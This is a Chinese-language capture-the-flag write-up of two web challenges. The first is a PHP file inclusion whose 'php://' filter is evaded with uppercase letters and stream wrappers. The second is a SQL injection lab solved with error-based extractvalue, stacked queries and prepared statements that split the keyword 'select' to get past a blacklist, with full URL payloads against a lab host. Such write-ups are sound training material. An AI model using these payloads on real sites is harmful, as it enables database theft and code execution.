Web_php_include
代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);//相当于过滤了php://
}
include($page);
?>
strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。
注释:该函数是区分大小写的。(菜鸟教程)
所以可以用大写PHP绕过
这里已经提示是文件包含,可以利用这个漏洞
利用php伪协议,读取目录文件dir
可以利用post流,执行代码
读取第一个php文件
这个文件内容好像没有变的样子,实际改变了,打开F12,flag在注释里
supersqli
从题目和标签大致猜到是sql注入
1.提交原本有的值1,可以看到
打开F12
是get方式
2.1后加单引号’,报错
http://111.198.29.45:34455/?inject=1'
3.加注释符–+或#,不报错
http://111.198.29.45:34455/?inject=1%27--+
以上两步,基本确定是注入
检查是否存在过滤
4.输入select
http://111.198.29.45:34455/?inject=select
返回return preg_match("/select|update|delete|drop|insert|where|./i",$inject);
即过滤以上字符
所以使用extractvalue报错注入
5.爆版本
http://111.198.29.45:34455/?inject=-1%27%20and%20extractvalue(1,concat(1,version()))--+
回显:’.18-MariaDB’
6.爆数据库
http://111.198.29.45:34455/?inject=-1%27%20and%20extractvalue(1,concat(1,database()))--+
回显:supersqli
7.爆表名,因为这里过滤了select,所以使用点击堆叠注入
http://111.198.29.45:34455/?inject=-1%27;use%20supersqli;show%20tables;--+
爆出两个表名1919810931114514和words
8.爆表1919810931114514的列
http://111.198.29.45:34455/?inject=-1%27;use%20information_schema;set%20@sql=concat(%27s%27,%27elect%20column_name%20from%20columns%20wher%27,%27e%20table_name=%221919810931114514%22%27);PREPARE%20stmt1%20FROM%20@sql;EXECUTE%20stmt1;--+
得到列:flag
9.爆列flag的字段
http://111.198.29.45:34455/?inject=-1%27;use%20supersqli;set%20@sql=concat(%27s%27,%27elect%20`flag`%20from%20`1919810931114514`%27);PREPARE%20stmt1%20FROM%20@sql;EXECUTE%20stmt1;--+
得到flag
考点:过滤了select的注入
%20是空格,%27是单引号的url编码